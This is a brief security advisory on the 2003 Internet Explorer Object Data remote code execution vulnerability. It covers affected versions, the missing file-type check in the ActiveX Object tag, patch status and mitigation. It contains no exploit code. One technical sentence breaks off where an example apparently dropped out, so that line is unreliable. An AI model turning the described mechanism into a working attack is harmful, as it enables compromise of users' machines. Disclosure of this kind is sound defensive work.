Critical Vulnerability Information Vulnerability Name: - Internet Explorer Object Data Remote Execution Vulnerability Report Date: - May 15, 2003 Release Date: - August 20, 2003 Severity: - High (Remote Code Execution) Affected Systems: - Microsoft Internet Explorer 5.01 - Microsoft Internet Explorer 5.5 - Microsoft Internet Explorer 6.0 - Microsoft Internet Explorer 6.0 for Windows Server 2003 Vulnerability Description: - eEye Digital Security discovered a security vulnerability in Microsoft Internet Explorer that allows arbitrary code execution by rendering malicious HTML. The vulnerability arises from the lack of file type validation in the remote data location parameter of the embedded ActiveX Object tag, enabling malicious code such as Trojans to run silently within web pages. Technical Description: - An example of exploitation demonstrates how an attacker can embed malicious code into a web page via HTTP requests and responses and return it through . When a user loads this page, Internet Explorer parses and executes the malicious code. - Regarding Internet Explorer’s Enhanced Security Configuration mode (enabled by default in Windows 2003), while it reduces the attack surface to some extent, special attention is still required for this vulnerability. Vendor Status: - Microsoft has released a patch for this vulnerability. See the Security Bulletin for details. Mitigation Measures: - Use Retina Network Security Scanner to detect and protect against this vulnerability. Apply the security patch released by Microsoft as soon as possible.